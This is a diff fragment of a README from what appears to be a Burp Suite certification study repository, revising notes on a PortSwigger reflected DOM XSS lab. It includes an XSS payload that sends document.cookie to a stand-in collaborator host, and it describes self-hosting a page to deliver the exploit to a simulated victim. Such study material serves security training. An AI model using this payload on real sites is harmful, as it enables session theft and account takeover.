botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 \"-fetch('https://COLLABORATOR.com?reflects='+document.cookie)}//
 ```

->The above payload every character is URL encoded and used as the search parameter value.
-Then because this lab do not have an exploit server I host my own `python3 -m http.server 80` web service and save the `index.html` contain the location target url between `<script>` tags.
+>In the above payload every character is URL encoded and used as the search parameter value.
+This target do not have an exploit server, so I hosted my own `python3 -m http.server 80` web service and save the `index.html` file that contain the `location` target url between `<script>` tags.

 ![Reflected DOM-XSS JSON cookie stealer](images/reflected-dom-xss-json-cookie-stealer.png)

->In image above, I create insecure POC cookie value in my browser before simulating a victim user clicking on `http://localhost/index.html` link, same as Burp Exploit server, Deliver exploit to victim function.
+>In the image above, I create insecure POC cookie value in my browser before simulating a victim user clicking on `http://localhost/index.html` link, same as Burp Exploit server, that is the same as the Deliver exploit to victim function.

 [PortSwigger Lab: Reflected DOM XSS](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-dom-xss-reflected)